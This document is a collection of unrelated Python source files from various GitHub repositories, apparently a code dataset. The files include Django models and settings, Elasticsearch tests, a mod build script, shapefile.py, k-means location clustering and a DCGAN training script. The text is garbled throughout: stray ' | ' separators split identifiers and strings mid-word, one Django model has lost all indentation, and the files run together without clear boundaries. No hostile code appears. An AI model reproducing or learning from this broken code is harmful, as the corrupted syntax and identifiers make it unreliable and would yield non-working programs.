        blank=True, verbose_name=_('Perfis Estruturais de Textos Articulados'),
        help_text=_("""
                    Apenas os perfis selecionados aqui estarão disponíveis
                    para o editor de Textos Articulados cujo Tipo seja este
                    em edição.
                    """))
    # Global footer note appended to every text of this type.
    rodape_global = models.TextField(
        verbose_name=_('Rodapé Global'),
        help_text=_('A cada Tipo de Texto Articulado pode ser adicionado '
                    'uma nota global de rodapé!'),
        default=''
    )

    class Meta:
        verbose_name = _('Tipo de Texto Articulado')
        verbose_name_plural = _('Tipos de Texto Articulados')
        ordering = ('id',)

    def __str__(self):
        return self.descricao
# Tri-state choice: None defers to the default defined on the type.
PARTICIPACAO_SOCIAL_CHOICES = [
    (None, _('Padrão definido no Tipo')),
    (True, _('Sim')),
    (False, _('Não'))]

# Privacy status codes for articulated texts; higher = more restricted.
STATUS_TA_PRIVATE = 99  # only the owners can see it
STATUS_TA_EDITION = 89
STATUS_TA_IMMUTABLE_RESTRICT = 79
STATUS_TA_IMMUTABLE_PUBLIC = 69
STATUS_TA_PUBLIC = 0

PRIVACIDADE_STATUS = (
    (STATUS_TA_PRIVATE, _('Privado')),  # only the owner views and edits
    # visible only with explicit permission
    # NOTE: label typo fixed ('Imotável' -> 'Imutável'); existing
    # translation catalogs for the old msgid need updating.
    (STATUS_TA_IMMUTABLE_RESTRICT, _('Imutável Restrito')),
    # visible only with explicit permission
    (STATUS_TA_IMMUTABLE_PUBLIC, _('Imutável Público')),
    (STATUS_TA_EDITION, _('Em Edição')),  # only with edit permission
    (STATUS_TA_PUBLIC, _('Público')),  # public view
)
@reversion.register()
class TextoArticulado(TimestampedMixin):
data = models.DateField(
blank=True,
null=True,
verbose_name=_('Data')
)
ementa = models.TextField(verbose_name=_('Ementa'))
observacao = models.TextField(
blank=True,
verbose_name=_('Observação')
)
numero = models.CharField(
max_length=8,
verbose_name=_('Número')
)
ano = models.PositiveSmallIntegerField(verbose_name=_('Ano'))
tipo_ta = models.ForeignKey(
TipoTextoArticulado,
blank=True,
null=True,
default=None,
verbose_name=_('Tipo de Texto Articulado'),
on_delete=models.PROTECT
)
participacao_social = models.BooleanField(
blank=True,
null=True,
default=False,
choices=PARTICIPACAO_SOCIAL_CHOICES,
verbose_name=_('Participação Social')
)
content_type = models.ForeignKey(
ContentType,
blank=True,
null=True,
default=None,
on_delete=models.PROTECT
)
object_id = models.PositiveIntegerField(
blank=True,
null=True,
default=None)
content_object = GenericForeignKey('content_type', 'object_id')
owners = models.ManyToManyField(
get_settings_auth_user_model(),
blank=True,
verbose_name=_('Donos do Texto Articulado')
)
editable_only_by_owners = models.BooleanField(
choices=YES_NO_CHOICES,
default=True,
verbose_name=_('Editável apenas pelos donos do Texto Articulado?')
)
editing_locked = models.BooleanField(
choices=YES_NO_CHOICES,
default=True,
verbose_name=_('Texto Articulado em E |
SelvorWhim/competitive | Codewars/ThinkingTestingAB.py | Python | unlicense | 217 | 0.013825 | # patt | ern seems to be multiplying every pair of digits from different numbers and adding them up
from itertools import product
def test_it(a, b):
return sum(int(d1)*int(d2) for | d1,d2 in product(str(a), str(b)))
|
Yelp/pyes | tests/test_percolator.py | Python | bsd-3-clause | 3,235 | 0.006182 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import unittest
from .estestcase import ESTestCase
from pyes.query import *
import unittest
class PercolatorTestCase(ESTestCase):
    """Exercises ES percolation: three registered queries ('apple',
    'apple OR iphone', 'apple AND iphone') are matched against documents."""

    def setUp(self):
        super(PercolatorTestCase, self).setUp()
        # Explicit mapping so the percolated fields are analyzed strings.
        mapping = { u'parsedtext': {'boost': 1.0,
                         'index': 'analyzed',
                         'store': 'yes',
                         'type': u'string',
                         "term_vector" : "with_positions_offsets"},
                 u'name': {'boost': 1.0,
                            'index': 'analyzed',
                            'store': 'yes',
                            'type': u'string',
                            "term_vector" : "with_positions_offsets"},
                 u'title': {'boost': 1.0,
                            'index': 'analyzed',
                            'store': 'yes',
                            'type': u'string',
                            "term_vector" : "with_positions_offsets"},
                 u'pos': {'store': 'yes',
                            'type': u'integer'},
                 u'uuid': {'boost': 1.0,
                           'index': 'not_analyzed',
                           'store': 'yes',
                           'type': u'string'}}
        self.conn.create_index(self.index_name)
        self.conn.put_mapping(self.document_type, {'properties':mapping}, self.index_name)
        # Register the three percolator queries, then refresh so they are
        # visible to the percolate calls in the tests below.
        self.conn.create_percolator(
            'test-index',
            'test-perc1',
            StringQuery(query='apple', search_fields='_all')
        )
        self.conn.create_percolator(
            'test-index',
            'test-perc2',
            StringQuery(query='apple OR iphone', search_fields='_all')
        )
        self.conn.create_percolator(
            'test-index',
            'test-perc3',
            StringQuery(query='apple AND iphone', search_fields='_all')
        )
        self.conn.refresh(self.index_name)

    def test_percolator(self):
        # 'iphone' alone: only the OR query matches.
        results = self.conn.percolate('test-index', 'test-type', PercolatorQuery({'name': 'iphone'}))
        self.assertTrue('test-perc1' not in results['matches'])
        self.assertTrue('test-perc2' in results['matches'])
        self.assertTrue('test-perc3' not in results['matches'])

    def test_or(self):
        # 'apple' alone: matches 'apple' and the OR query, not the AND query.
        results = self.conn.percolate('test-index', 'test-type', PercolatorQuery({'name': 'apple'}))
        self.assertTrue('test-perc1' in results['matches'])
        self.assertTrue('test-perc2' in results['matches'])
        self.assertTrue('test-perc3' not in results['matches'])

    def test_and(self):
        # Both terms present: all three queries match.
        results = self.conn.percolate('test-index', 'test-type', PercolatorQuery({'name': 'apple iphone'}))
        self.assertTrue('test-perc1' in results['matches'])
        self.assertTrue('test-perc2' in results['matches'])
        self.assertTrue('test-perc3' in results['matches'])

    def tearDown(self):
        # Remove the registered percolators before the base-class teardown
        # drops the index.
        self.conn.delete_percolator('test-index', 'test-perc1')
        self.conn.delete_percolator('test-index', 'test-perc2')
        self.conn.delete_percolator('test-index', 'test-perc3')
        super(PercolatorTestCase, self).tearDown()
if __name__ == "__main__":
unittest.main()
|
puittenbroek/slimmermeten | slimmermeten/settings/base.py | Python | bsd-3-clause | 9,633 | 0.001661 | """
This is your project's main settings file that can be committed to your
repo. If you need to override a setting locally, use local.py
"""
import os
import logging
# Normally you should not import ANYTHING from Django directly
# into your settings, but ImproperlyConfigured is an exception.
from django.core.exceptions import ImproperlyConfigured
def get_env_setting(setting):
    """ Get the environment setting or return exception """
    value = os.environ.get(setting)
    if value is None:
        # Missing variable: fail loudly at startup with a clear message.
        raise ImproperlyConfigured("Set the %s env variable" % setting)
    return value
# Your project root
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__) + "../../../")
SUPPORTED_NONLOCALES = ['media', 'admin', 'static']
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# Defines the views served for root URLs.
ROOT_URLCONF = 'slimmermeten.urls'
# Application definition
INSTALLED_APPS = (
# Django contrib apps
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.admin',
'django.contrib.humanize',
'django.contrib.syndication',
'django.contrib.staticfiles',
# Third-party apps, patches, fixes
'djcelery',
'debug_toolbar',
'compressor',
# Database migrations
'south',
# Application base, containing global templates.
'base',
# Local apps, referenced via appname
'slimmermeten'
)
# Place bcrypt first in the list, so it will be the default password hashing
# mechanism
PASSWORD_HASHERS = (
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.SHA1PasswordHasher',
'django.contrib.auth.hashers.MD5PasswordHasher',
'django.contrib.auth.hashers.CryptPasswordHasher',
)
# Sessions
#
# By default, be at least somewhat secure with our session cookies.
SESSION_COOKIE_HTTPONLY = True
# Set this to true if you are using https
SESSION_COOKIE_SECURE = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.example.com/media/"
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.example.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.example.com/static/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')
# URL prefix for static files.
# Example: "http://media.example.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale |
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Eu | rope/Amsterdam'
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
TEMPLATE_CONTEXT_PROCESSORS = [
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.media',
'django.core.context_processors.request',
'django.core.context_processors.i18n',
'django.core.context_processors.static',
'django.core.context_processors.csrf',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
]
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or
# "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(PROJECT_ROOT, 'templates'),
)
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
def custom_show_toolbar(request):
    """ Only show the debug toolbar to users with the superuser flag. """
    user = request.user
    return user.is_superuser
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TOOLBAR_CALLBACK': 'slimmermeten.settings.base.custom_show_toolbar',
'HIDE_DJANGO_SQL': True,
'TAG': 'body',
'SHOW_TEMPLATE_CONTEXT': True,
'ENABLE_STACKTRACES': True,
}
# DEBUG_TOOLBAR_PANELS = (
# #'debug_toolbar_user_panel.panels.UserPanel',
# 'debug_toolbar.panels.version.VersionDebugPanel',
# 'debug_toolbar.panels.timer.TimerDebugPanel',
# 'debug_toolbar.panels.settings_vars.SettingsVarsDebugPanel',
# 'debug_toolbar.panels.headers.HeaderDebugPanel',
# 'debug_toolbar.panels.request_vars.RequestVarsDebugPanel',
# 'debug_toolbar.panels.template.TemplateDebugPanel',
# 'debug_toolbar.panels.sql.SQLDebugPanel',
# 'debug_toolbar.panels.signals.SignalDebugPanel',
# 'debug_toolbar.panels.logger.LoggingPanel',
# )
# Specify a custom user model to use
#AUTH_USER_MODEL = 'accounts.MyUser'
FILE_UPLOAD_PERMISSIONS = 0o0664
# The WSGI Application to use for runserver
WSGI_APPLICATION = 'slimmermeten.wsgi.application'
# Define your database connections
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.',
'NAME': '',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
#'OPTIONS': {
# 'init_command': 'SET storage_engine=InnoDB',
# 'charset' : 'utf8',
# 'use_unicode' : True,
#},
#'TEST_CHARSET': 'utf8',
#'TEST_COLLATION': 'utf8_general_ci',
},
# 'slave': {
# ...
# },
}
# Uncomment this and set to all slave DBs in use on the site.
# SLAVE_DATABASES = ['slave']
# Recipients of traceback emails and other notifications.
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
# SECURITY WARNING: don't run with debug turned on in production!
# Debugging displays nice error messages, but leaks memory. Set this to False
# on all server instances and True only for development.
DEBUG = TEMPLATE_DEBUG = False
# Is this a development instance? Set this to True on development/master
# instances and False on stage/prod.
DEV = False
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# SECURITY WARNING: keep the secret key used in production secret!
# |
dex4er/django-pyc | test_project/tests.py | Python | lgpl-3.0 | 333 | 0 | from django.cor | e.management import call_command
from django.test import TestCase
class ClearCache(TestCase):
@staticmethod
def test_compilepyc():
call_command('compilepyc', 'django_pyc', verbosity=1, force=True)
@staticmethod
def test_clearpyc():
| call_command('clearpyc', verbosity=1, force=True)
|
resamsel/dbmanagr | src/dbmanagr/driver/sqlite/driver.py | Python | gpl-3.0 | 1,308 | 0 | # -*- coding: utf-8 -*-
#
# Copyright © 2014 René Samselnig
#
# This file is part of Database Navigator.
#
# Database Navigator is free software: you can redistribute it a | nd/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Database Navigator is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty o | f
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Database Navigator. If not, see <http://www.gnu.org/licenses/>.
#
import logging
from dbmanagr.logger import LogWith
from dbmanagr.options import restriction, FileOptionsParser
from dbmanagr.driver import DatabaseDriver
logger = logging.getLogger(__name__)
class SQLiteDriver(DatabaseDriver):
    """SQLite flavour of the database driver."""

    @LogWith(logger)
    def restriction(self, *args):
        # Delegates to the generic restriction helper from dbmanagr.options.
        return restriction(*args)

    def statement_activity(self, con):
        # No server-side statement activity is reported for SQLite.
        return []

    def __repr__(self):
        return str(self.__dict__)
class SQLiteOptionsParser(FileOptionsParser):
    """File-based options parser that produces the SQLite driver."""

    def create_driver(self):
        return SQLiteDriver()
|
BourbonWarfare/POTATO | tools/build.py | Python | gpl-2.0 | 2,898 | 0.006901 | #!/usr/bin/env python3
import os
import sys
import subprocess
######## GLOBALS #########
# Top-level mod folder prefix and the prefix of every built addon PBO
# (used to derive "potato_<addon>.pbo" names below).
MAINPREFIX = "z"
PREFIX = "potato_"
##########################
def tryHemttBuild(projectpath):
    """Run `hemtt pack` when hemtt.exe exists; return whether it was used."""
    hemtt_exe = os.path.join(projectpath, "hemtt.exe")
    if not os.path.isfile(hemtt_exe):
        print("hemtt not installed")
        return False
    os.chdir(projectpath)
    ret = subprocess.call([hemtt_exe, "pack"], stderr=subprocess.STDOUT)
    print("Using hemtt: {}".format(ret))
    # Considered handled as soon as hemtt exists, regardless of exit code.
    return True
def mod_time(path):
    """Return the newest modification time of *path* and everything under it."""
    if not os.path.isdir(path):
        return os.path.getmtime(path)
    latest = os.path.getmtime(path)
    for entry in os.listdir(path):
        latest = max(latest, mod_time(os.path.join(path, entry)))
    return latest
def check_for_changes(addonspath, module):
    """True when the module sources are newer than its PBO, or no PBO exists."""
    pbo_path = os.path.join(addonspath, "{}{}.pbo".format(PREFIX, module))
    if not os.path.exists(pbo_path):
        return True
    source_path = os.path.join(addonspath, module)
    return mod_time(source_path) > mod_time(pbo_path)
def check_for_obsolete_pbos(addonspath, file):
    """True when a built PBO no longer has a matching source folder."""
    # Strip the "potato_" prefix and the ".pbo" extension.
    module_name = file[len(PREFIX):-4]
    return not os.path.exists(os.path.join(addonspath, module_name))
def main():
    """Build changed addon PBOs, pruning obsolete files first.

    Prefers hemtt when available; otherwise rebuilds each changed addon
    directory with makepbo and prints a summary of the results.
    """
    print("""
  ####################
  # POTATO Debug Build #
  ####################
  """)

    scriptpath = os.path.realpath(__file__)
    projectpath = os.path.dirname(os.path.dirname(scriptpath))
    addonspath = os.path.join(projectpath, "addons")

    # Prefer hemtt when present; it handles packing on its own.
    if tryHemttBuild(projectpath):
        return

    os.chdir(addonspath)

    made = 0
    failed = 0
    skipped = 0
    removed = 0

    # Prune PBOs whose source directory no longer exists.
    for file in os.listdir(addonspath):
        if os.path.isfile(file):
            if check_for_obsolete_pbos(addonspath, file):
                removed += 1
                print(" Removing obsolete file => " + file)
                os.remove(file)
    print("")

    for p in os.listdir(addonspath):
        path = os.path.join(addonspath, p)
        if not os.path.isdir(path):
            continue
        if p[0] == ".":
            continue
        if not check_for_changes(addonspath, p):
            skipped += 1
            print(" Skipping {}.".format(p))
            continue
        print("# Making {} ...".format(p))
        # Narrowed from a bare except: OSError covers a missing makepbo
        # binary, CalledProcessError covers a failed pack.
        try:
            subprocess.check_output([
                "makepbo",
                "-NUP",
                "-@={}\\{}\\addons\\{}".format(MAINPREFIX, PREFIX.rstrip("_"), p),
                p,
                "{}{}.pbo".format(PREFIX, p)
            ], stderr=subprocess.STDOUT)
        except (OSError, subprocess.CalledProcessError):
            failed += 1
            print(" Failed to make {}.".format(p))
        else:
            made += 1
            print(" Successfully made {}.".format(p))

    print("\n# Done.")
    print(" Made {}, skipped {}, removed {}, failed to make {}.".format(made, skipped, removed, failed))


if __name__ == "__main__":
    sys.exit(main())
|
CalebM1987/pyshp | shapefile.py | Python | mit | 47,927 | 0.005529 | """
shapefile.py
Provides read and write support for ESRI Shapefiles.
author: jlawhead<at>geospatialpython.com
date: 2015/06/22
version: 1.2.3
Compatible with Python versions 2.4-3.x
version changelog: Reader.iterShapeRecords() bugfix for Python 3
"""
__version__ = "1.2.3"
from struct import pack, unpack, calcsize, error
import os
import sys
import time
import array
import tempfile
import itertools
import datetime
import re
#
# Constants for shape types (per the ESRI Shapefile specification)
NULL = 0
POINT = 1
POLYLINE = 3
POLYGON = 5
MULTIPOINT = 8
POINTZ = 11
POLYLINEZ = 13
POLYGONZ = 15
MULTIPOINTZ = 18
POINTM = 21
POLYLINEM = 23
POLYGONM = 25
MULTIPOINTM = 28
MULTIPATCH = 31

PYTHON3 = sys.version_info[0] == 3

# Raw string: '\d' is an invalid escape sequence in a plain string literal
# (DeprecationWarning on modern CPython, an error in the future).
DATE_EXP = re.compile(r'\d{4}[-/]\d{2}[-/]\d{2}')

if PYTHON3:
    # Aliases so the rest of the module can use Python 2 names uniformly.
    xrange = range
    izip = zip
    basestring = str
else:
    from itertools import izip
def b(v):
    """Coerce *v* to bytes on Python 3; pass str through on Python 2."""
    if not PYTHON3:
        # For python 2 assume str passed in and return str.
        return v
    if isinstance(v, str):
        # For python 3 encode str to bytes.
        return v.encode('utf-8')
    if isinstance(v, bytes):
        # Already bytes.
        return v
    raise Exception('Unknown input type')
def u(v):
    """Coerce *v* to text on Python 3; pass str through on Python 2."""
    if not PYTHON3:
        # For python 2 assume str passed in and return str.
        return v
    # The blanket fallback (return v unchanged on any failure) is kept on
    # purpose: some real-world DBFs (e.g. naturalearthdata's
    # ne_110m_admin_0_countries) contain bytes that fail UTF-8 decoding.
    try:
        if isinstance(v, bytes):
            return v.decode('utf-8')
        if isinstance(v, str):
            return v
        raise Exception('Unknown input type')
    except:
        return v
def is_string(v):
    """Return True when *v* is a text type for the running Python version."""
    # The else operand is only evaluated on Python 2, where basestring exists.
    return isinstance(v, str if PYTHON3 else basestring)
class _Array(array.array):
    """Converts python tuples to lists of the appropriate type.
    Used to unpack different shapefile header parts."""
    def __repr__(self):
        return str(self.tolist())
def signed_area(coords):
    """Return the signed area enclosed by a ring using the linear time
    algorithm at http://www.cgafaq.info/wiki/Polygon_Area. A value >= 0
    indicates a counter-clockwise oriented ring.

    *coords* must be a closed ring (first point repeated at the end).
    """
    xs, ys = [list(column) for column in zip(*coords)]
    # Wrap around by one vertex so every point has a successor/predecessor.
    xs.append(xs[1])
    ys.append(ys[1])
    total = 0.0
    for i in range(1, len(coords)):
        total += xs[i] * (ys[i + 1] - ys[i - 1])
    return total / 2.0
class _Shape:
    def __init__(self, shapeType=None):
        """Stores the geometry of the different shape types
        specified in the Shapefile spec. Shape types are
        usually point, polyline, or polygons. Every shape type
        except the "Null" type contains points at some level for
        example verticies in a polygon. If a shape type has
        multiple shapes containing points within a single
        geometry record then those shapes are called parts. Parts
        are designated by their starting index in geometry record's
        list of shapes."""
        self.shapeType = shapeType
        self.points = []
    @property
    def __geo_interface__(self):
        # Translate this shape into the GeoJSON-like __geo_interface__
        # mapping, picking the geometry type from self.shapeType.
        if self.shapeType in [POINT, POINTM, POINTZ]:
            return {
            'type': 'Point',
            'coordinates': tuple(self.points[0])
            }
        elif self.shapeType in [MULTIPOINT, MULTIPOINTM, MULTIPOINTZ]:
            return {
            'type': 'MultiPoint',
            'coordinates': tuple([tuple(p) for p in self.points])
            }
        elif self.shapeType in [POLYLINE, POLYLINEM, POLYLINEZ]:
            if len(self.parts) == 1:
                # Single part: a plain LineString.
                return {
                'type': 'LineString',
                'coordinates': tuple([tuple(p) for p in self.points])
                }
            else:
                # Multiple parts: slice self.points at each part's start
                # index. The for/else appends the final slice (from the
                # last part start to the end) once the loop finishes.
                ps = None
                coordinates = []
                for part in self.parts:
                    if ps == None:
                        ps = part
                        continue
                    else:
                        coordinates.append(tuple([tuple(p) for p in self.points[ps:part]]))
                        ps = part
                else:
                    coordinates.append(tuple([tuple(p) for p in self.points[part:]]))
                return {
                'type': 'MultiLineString',
                'coordinates': tuple(coordinates)
                }
        elif self.shapeType in [POLYGON, POLYGONM, POLYGONZ]:
            if len(self.parts) == 1:
                return {
                'type': 'Polygon',
                'coordinates': (tuple([tuple(p) for p in self.points]),)
                }
            else:
                # Same part-slicing scheme as MultiLineString above.
                ps = None
                coordinates = []
                for part in self.parts:
                    if ps == None:
                        ps = part
                        continue
                    else:
                        coordinates.append(tuple([tuple(p) for p in self.points[ps:part]]))
                        ps = part
                else:
                    coordinates.append(tuple([tuple(p) for p in self.points[part:]]))
                # Group rings into polygons: a clockwise ring (negative
                # signed area) is treated as starting a new polygon;
                # subsequent rings are attached to the current one.
                # NOTE(review): this assumes the first ring starts a
                # polygon and that exterior rings are clockwise here.
                polys = []
                poly = [coordinates[0]]
                for coord in coordinates[1:]:
                    if signed_area(coord) < 0:
                        polys.append(poly)
                        poly = [coord]
                    else:
                        poly.append(coord)
                polys.append(poly)
                if len(polys) == 1:
                    return {
                    'type': 'Polygon',
                    'coordinates': tuple(polys[0])
                    }
                elif len(polys) > 1:
                    return {
                    'type': 'MultiPolygon',
                    'coordinates': polys
                    }
class _ShapeRecord:
| """A shape object of any type."""
def __init__(self, shape=None, record=None):
self.shape = shape
self.record = record
class ShapefileException(Exception):
    """An exception to handle shapefile specific problems."""
    # Raised by Reader/Writer code paths for errors specific to this library.
    pass
class Reader:
"""Reads the three files of a shapefile as a uni | t or
separately. If one of the three files (.shp, .shx,
.dbf) is missing no exception is thrown until you try
to call a method that depends on that particular file.
The .shx index file is used if available for efficiency
but is not required to read the geometry from the .shp
file. The "shapefile" argument in the constructor is the
name of the file you want to open.
You can instantiate a Reader without specifying a shapefile
and then specify one later with the load() method.
Only the shapefile headers are read upon loading. Content
within each file is only accessed when required and as
efficiently as possible. Shapefiles are usually not large
but they can be.
"""
def __init__(self, *args, **kwargs):
self.shp = None
self.shx = None
self.dbf = None
self.shapeName = "Not specified"
self._offsets = []
self.shpLength = None
self.numRecords = None
self.fields = []
self.__dbfHdrLength = 0
# See if a shapefile name was passed as an argument
if len(args) > 0:
if is_string(args[0]):
self.load(args[0])
return
if "shp" in kwargs.keys():
if hasattr(kwargs["shp"], "read"):
self.shp = kwargs["shp"]
if hasattr(self.shp, "seek"):
self.shp.seek(0)
if "shx" in kwargs.keys():
if hasattr(kwargs["shx"], "read"):
self.shx = kwargs["shx"]
|
datoszs/analysis | datoszs/remote.py | Python | mit | 504 | 0 | import os
import spiderpig as sp
@sp.configured()
def get_filename(filename, ssh_host=None, data_dir=None):
if ssh_host is None:
return filename
else:
local_copy = '{}/local_copy/{}'.format(data_dir, filename)
if not os.path.exists(lo | cal_copy):
dirs = os.path.dirname(local_copy)
if not os.path.exists(dirs):
os.makedirs(dirs)
os.system("scp {}:{} {}".format(ssh_host, filename, local | _copy))
return local_copy
|
axelniklasson/adalyzer | backend/location_optimisation.py | Python | mit | 1,650 | 0.033939 | from sklearn import cluster
import numpy as np
import datetime
#import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
class Location:
    """Computes and caches popular vehicle locations via k-means clustering."""

    # Cached result of the most recent set_optimal_locations() call.
    vehicle_data = None

    @staticmethod
    def get_data():
        """Return the cached optimal locations as a list, or None if unset."""
        if Location.vehicle_data is not None:
            return Location.vehicle_data.tolist()
        else:
            return None

    @staticmethod
    def __preprocess(payload):
        """Extract an (n, 2) lat/lng array from the raw vehicle payload."""
        lat_lng = np.empty([len(payload), 2])
        for i in range(0, len(payload)):
            lat_lng[i, 0] = payload[i]['positioning_system']['location']['lat']
            lat_lng[i, 1] = payload[i]['positioning_system']['location']['lng']
        return lat_lng

    @staticmethod
    def set_optimal_locations(data, count=5, no_clusters=10):
        """Cluster vehicle positions and cache the *count* densest centres."""
        data = Location.__preprocess(data)
        kmeans = cluster.KMeans(no_clusters, max_iter=300, n_init=10,
                                init='k-means++', precompute_distances='auto')
        clusters = kmeans.fit_predict(data)
        # Count how many points fall into each cluster:
        # column 0 = cluster id, column 1 = membership count.
        classes_count = np.zeros([no_clusters, 2])
        for i in range(0, clusters.size):
            classes_count[clusters[i], 0] = clusters[i]
            classes_count[clusters[i], 1] += 1
        by_size = classes_count[classes_count[:, 1].argsort()]
        cluster_locations = np.empty([count, 2])
        c = 0
        # Walk the clusters from largest to smallest membership.
        for j in range(by_size[:, 0].size - 1, by_size[:, 0].size - count - 1, -1):
            # by_size holds floats (it came from np.zeros); NumPy requires
            # integer indices, so cast before indexing cluster_centers_.
            cluster_locations[c] = kmeans.cluster_centers_[int(by_size[j, 0])]
            c += 1
        # Plot configurations
        #fig = plt.figure()
        #plt.plot(data[:,0], data[:,1], 'gx')
        #plt.plot(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], 'bo')
        #plt.legend(('Data', 'Centroids'), loc='upper left')
        #plt.show()
        #plt.savefig('plt-gen-' + datetime.datetime.now().isoformat() + '.png')
        #plt.close(fig)
        Location.vehicle_data = cluster_locations
lishuwnc/DCGAN | main.py | Python | apache-2.0 | 10,297 | 0.0101 | import tensorflow as tf
import tensorflow.contrib.slim as slim
import pprint
import os
from datasets import dataset_factory
from dcgan import dcgan_generator, dcgan_discriminator
from train import dcgan_train_step
from tensorflow.python.training import optimizer
from collections import OrderedDict
from utils import graph_replace
#from keras.optimizers import Adam
flags = tf.app.flags
flags.DEFINE_integer('batch_size', 128, 'The size of minibatch when training [128]')
flags.DEFINE_float('learning_rate', 2e-4, 'Learning rate of optimizer [2e-4]')
flags.DEFINE_string('optimizer', 'Adam', 'Optimizer used when training [Adam]')
flags.DEFINE_string('dataset_name', 'mnist', 'Image dataset used when trainging [mnist]')
flags.DEFINE_string('split_name', 'train', 'Split name of dataset [train]')
flags.DEFINE_string('dataset_dir', './data/mnist/', 'Path to dataset directory [./data/mnist]')
flags.DEFINE_string('checkpoint_path', None, 'Path to checkpoint path [None]')
flags.DEFINE_string('train_dir', './train', 'Path to save new training result [./train]')
flags.DEFINE_integer('max_step', 1000, 'Maximum training steps [1000]')
flags.DEFINE_integer('z_dim', 100, 'z-dim for generator [100]')
flags.DEFINE_float('beta1', 0.5, 'Beta1 for Adam optimizer [0.5]')
flags.DEFINE_float('beta2', 0.999, 'Beta2 for Adam optimizer [0.999]')
flags.DEFINE_float('epsilon', 1e-8, 'Epsilon for Adam optimizer [1e-8]')
flags.DEFINE_integer('log_every_n_steps', 10, 'Log every n training steps [10]')
flags.DEFINE_integer('save_interval_secs', 600, 'How often, in seconds, to save the model checkpoint [600]')
flags | .DEFINE_integer('save_summaries_secs', 10, 'How often, in seconds, to save the summary [10]')
flags.DEFINE_integer('sample_n', 16, 'How many images the network will produce in a sample process [16]')
flags.DEFINE_integer('unrolled_step', 0, 'Unrolled step in surrogate loss for generator [0]')
def extract_update_dict(update_ops):
    """Extract the map between each variable tensor and its updated value.

    Supports the 'Assign' and 'AssignAdd' op types emitted by optimizers;
    raises ValueError for anything else.
    """
    update_map = OrderedDict()
    name_to_var = {v.name: v for v in tf.global_variables()}
    for u in update_ops:
        var_name = u.op.inputs[0].name
        var = name_to_var[var_name]
        value = u.op.inputs[1]
        if u.op.type == 'Assign':
            update_map[var.value()] = value
        elif u.op.type == 'AssignAdd':
            # AssignAdd carries a delta; record the resulting value.
            update_map[var.value()] = value + var
        else:
            # Fixed: the original passed the op type as a second ValueError
            # argument instead of interpolating it into the message.
            raise ValueError('Undefined unroll update type %s' % u.op.type)
    return update_map
def main(*args):
FLAGS = flags.FLAGS
pp = pprint.PrettyPrinter(indent=4)
print('Running flags:')
pp.pprint(FLAGS.__dict__['__flags'])
tf.logging.set_verbosity('INFO')
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Graph().as_default():
provider = slim.dataset_data_provider.DatasetDataProvider(dataset_factory.get_dataset(FLAGS.dataset_name, FLAGS.split_name, FLAGS.dataset_dir),
common_queue_capacity=2*FLAGS.batch_size,
common_queue_min=FLAGS.batch_size)
[image] = provider.get(['image'])
image = tf.to_float(image)
image = tf.subtract(tf.divide(image, 127.5), 1)
